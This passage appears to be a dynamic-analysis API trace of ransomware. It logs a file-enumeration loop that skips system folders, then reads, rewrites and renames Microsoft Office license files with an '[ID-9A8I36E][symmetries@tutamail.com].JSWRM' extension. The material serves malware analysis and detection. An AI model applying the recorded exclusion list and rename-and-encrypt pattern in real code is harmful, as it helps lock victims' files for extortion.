(in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.044] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe85274bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe85274bc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe85e6080, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b97, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointR_Trial-pl.xrm-ms", cAlternateFileName="POD944~1.XRM")) returned 1 [0107.044] lstrcmpiW (lpString1="PowerPointR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0107.044] lstrcmpiW (lpString1="PowerPointR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0107.044] lstrcmpiW (lpString1="PowerPointR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0107.044] lstrcmpiW (lpString1="PowerPointR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0107.044] lstrcmpiW (lpString1="PowerPointR_Trial-pl.xrm-ms", lpString2="recovery") returned -1 [0107.044] lstrcmpiW (lpString1="PowerPointR_Trial-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.044] lstrcmpiW (lpString1="PowerPointR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.044] lstrcmpiW (lpString1="PowerPointR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.044] lstrcmpiW (lpString1="PowerPointR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.044] lstrcmpiW (lpString1="PowerPointR_Trial-pl.xrm-ms", lpString2="msocache") returned 1 [0107.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Trial-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0107.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0107.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Trial-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240f48, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0107.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0107.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Trial-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0107.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0107.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Trial-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241290, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0107.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0107.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0107.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0107.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0107.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.045] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11159) returned 1 [0107.045] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b90) returned 0x24c1d0 [0107.045] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b90, lpOverlapped=0x0) returned 1 [0107.048] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.048] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b90, lpOverlapped=0x0) returned 1 [0107.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.048] CloseHandle (hObject=0x45c) returned 1 [0107.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0107.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0107.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0107.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0107.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0107.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0107.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.049] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0107.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0107.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0107.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0107.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0107.049] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe850125e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe850125e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe85bfe34, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51a9, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointR_Trial-ppd.xrm-ms", cAlternateFileName="POWERP~4.XRM")) returned 1 [0107.049] lstrcmpiW (lpString1="PowerPointR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0107.050] lstrcmpiW (lpString1="PowerPointR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0107.050] lstrcmpiW (lpString1="PowerPointR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0107.050] lstrcmpiW (lpString1="PowerPointR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0107.050] lstrcmpiW (lpString1="PowerPointR_Trial-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.050] lstrcmpiW (lpString1="PowerPointR_Trial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.050] lstrcmpiW (lpString1="PowerPointR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.050] lstrcmpiW (lpString1="PowerPointR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.050] lstrcmpiW (lpString1="PowerPointR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.050] lstrcmpiW (lpString1="PowerPointR_Trial-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Trial-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0107.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0107.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Trial-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241100, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0107.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0107.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Trial-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0107.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0107.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Trial-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241010, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0107.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0107.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0107.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0107.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0107.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.051] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20905) returned 1 [0107.051] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51a0) returned 0x24c1d0 [0107.051] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51a0, lpOverlapped=0x0) returned 1 [0107.057] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.057] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51a0, lpOverlapped=0x0) returned 1 [0107.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.057] CloseHandle (hObject=0x45c) returned 1 [0107.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0107.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0107.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0107.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0107.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0107.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0107.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.058] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0107.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0107.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0107.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0107.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0107.059] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8789aa5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8789aa5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8894afa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d5b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointR_Trial-ul-oob.xrm-ms", cAlternateFileName="PO2920~1.XRM")) returned 1 [0107.059] lstrcmpiW (lpString1="PowerPointR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.059] lstrcmpiW (lpString1="PowerPointR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.059] lstrcmpiW (lpString1="PowerPointR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.059] lstrcmpiW (lpString1="PowerPointR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.059] lstrcmpiW (lpString1="PowerPointR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.059] lstrcmpiW (lpString1="PowerPointR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.059] lstrcmpiW (lpString1="PowerPointR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.059] lstrcmpiW (lpString1="PowerPointR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.059] lstrcmpiW (lpString1="PowerPointR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.059] lstrcmpiW (lpString1="PowerPointR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0107.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Trial-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0107.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0107.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Trial-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f70, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0107.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0107.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Trial-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0107.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0107.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Trial-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241038, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0107.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0107.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0107.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0107.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.060] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11611) returned 1 [0107.060] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0107.060] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0107.064] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.064] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0107.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.065] CloseHandle (hObject=0x45c) returned 1 [0107.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0107.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0107.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0107.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0107.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0107.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0107.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.065] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft 